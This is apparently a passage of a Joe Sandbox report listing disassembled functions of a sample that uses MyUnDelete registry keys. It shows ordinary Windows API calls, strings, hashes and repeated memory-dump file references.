Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ErrorFileLastPointer$AllocatorDebugHeap
String ID:
API String ID: 3376223761-0
Opcode ID: 9eaaa86c3a1eb242040a60cb8ee05e4232c94e78d40b13a0022204d181a1c3cc
Instruction ID: 513345a377ec99ab2b3395a26b63be09ea4697a2def771a6d2a2b949087cb946
Opcode Fuzzy Hash: 9eaaa86c3a1eb242040a60cb8ee05e4232c94e78d40b13a0022204d181a1c3cc
Instruction Fuzzy Hash: 54914C70A012489FDB04CFD5D994BAEB7F9FF48304F24852AE406AB384E778A945CF55

Function 004445B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004445C5

Part of subcall function 00406CE0: ScreenToClient.USER32(?,?), ref: 00406CF2

LoadCursorW.USER32(00000000,00007F84), ref: 0044462D
SetCursor.USER32(00000000), ref: 00444634
LoadCursorW.USER32(00000000,00007F85), ref: 00444643
SetCursor.USER32(00000000), ref: 0044464A
LoadCursorW.USER32(00000000,00007F82), ref: 00444659
SetCursor.USER32(00000000), ref: 00444660
LoadCursorW.USER32(00000000,00007F83), ref: 0044466F
SetCursor.USER32(00000000), ref: 00444676

Strings

$, xrefs: 0044460F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Cursor$Load$ClientScreen
String ID: $
API String ID: 789353160-3993045852
Opcode ID: 08d7bf53d0a7c19e1a0aec1cbad70f5fea0665466bd2dba9f754cc9acc729b4d
Instruction ID: af148dd984a561edc3adf06dc0c77326c2044b676e30cd5a3813436fff3c9ef9
Opcode Fuzzy Hash: 08d7bf53d0a7c19e1a0aec1cbad70f5fea0665466bd2dba9f754cc9acc729b4d
Instruction Fuzzy Hash: 13319374A08109EBEB04DFD5CC45EAE77B4BF89305F004529F60BA7190DB78A900CB6B

Function 0040AD17 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,0040AE31), ref: 0040AD25
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040AD46
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040AD58
GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040AD6A
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040AD7C

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

Strings

ReleaseActCtx, xrefs: 0040AD48
CreateActCtxW, xrefs: 0040AD40
DeactivateActCtx, xrefs: 0040AD6C
KERNEL32, xrefs: 0040AD20
ActivateActCtx, xrefs: 0040AD5A

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: a6f6ae76d2b6d6199ecdf2c211a386f99f59f045e645e31de2a1c3e51ca2110f
Instruction ID: 16272f7cc944f3a9297da0941e2e443fb6f46a64a8cc23af4762156ba9ee9e23
Opcode Fuzzy Hash: a6f6ae76d2b6d6199ecdf2c211a386f99f59f045e645e31de2a1c3e51ca2110f
Instruction Fuzzy Hash: 90F0F478940356BECB007F66AC0550B3EE5A724B547104C3FF900D7261F678805C8F4E

Function 0044C760 Relevance: 16.6, APIs: 11, Instructions: 132COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(24000003), ref: 0044C77A
SetLastError.KERNEL32(24000004), ref: 0044C7C2

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 36255745b6588212c41fd55ecca567276a0a53839a0c2e3a5bddd15552570cab
Instruction ID: b86fd6c011ca35e3a67076a62847643032544da1ead97ac8c872151e4d8672ea
Opcode Fuzzy Hash: 36255745b6588212c41fd55ecca567276a0a53839a0c2e3a5bddd15552570cab
Instruction Fuzzy Hash: B9511738A00205EFDB08DF54D894E5AB7B5FF48304F248599ED269B391D730EA82CFA5

Function 004564C0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\SeriousBit\MyUnDelete\Images,?), ref: 004564EB
RegEnumValueW.ADVAPI32(?,?,?,00000800,00000000,?,?,00001000), ref: 00456552
wsprintfW.USER32 ref: 004565C4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 004565F8
lstrlenW.KERNEL32(?), ref: 0045661C
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00456638
RegCloseKey.ADVAPI32(?), ref: 0045665E

Strings

Software\SeriousBit\MyUnDelete\Images, xrefs: 004564E1
image%d, xrefs: 004565B8

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Value$CloseCreateEnumQuerylstrlenwsprintf
String ID: Software\SeriousBit\MyUnDelete\Images$image%d
API String ID: 3907727699-1543728650
Opcode ID: adf6d0ef8f9ee983cc5a689408d61795d67df57eef3447cc05e2d634fa4e2a17
Instruction ID: 0110294e0e2ab5848601e8dc6902ecf3b6e9da505efc30ab299688d6d9bf5a01
Opcode Fuzzy Hash: adf6d0ef8f9ee983cc5a689408d61795d67df57eef3447cc05e2d634fa4e2a17
Instruction Fuzzy Hash: 9151947190021CEFDB14CF90DC88BEEB7B5FB44305F50819AE905A7242E778AA98CF55

Function 004120D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004120D7
GetPropW.USER32(?,AfxOldWndProc423), ref: 004120E6
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 00412140

Part of subcall function 00410F0B: GetWindowRect.USER32(?,10000000), ref: 00410F35

SetWindowLongW.USER32(?,000000FC,?), ref: 00412167
RemovePropW.USER32(?,AfxOldWndProc423), ref: 0041216F
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 00412176
GlobalDeleteAtom.KERNEL32(?), ref: 00412180
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 004121D4

Strings

AfxOldWndProc423, xrefs: 004120DF, 004120E4, 0041216D, 00412175

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: 718178074337ef3bdaa0335e638f4a13cbbf93a2275474db7b1085935155cde9
Instruction ID: c9ab8ec546d6756883c71795a63d3f0b2ff94b93c6ce8c4f32deb522425eef2c
Opcode Fuzzy Hash: 718178074337ef3bdaa0335e638f4a13cbbf93a2275474db7b1085935155cde9
Instruction Fuzzy Hash: FA315735400119BBCF11AFA5DD49DFF3AB9BF05315F00012AF601E5151DBB98961DB6A

Function 00454D00 Relevance: 15.1, APIs: 10, Instructions: 92threadfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00454D2F
ExitThread.KERNEL32 ref: 00454D43
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00454D51
CloseHandle.KERNEL32(000000FF), ref: 00454D5B
CloseHandle.KERNEL32(000000FF), ref: 00454DCF
ExitThread.KERNEL32 ref: 00454DDA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
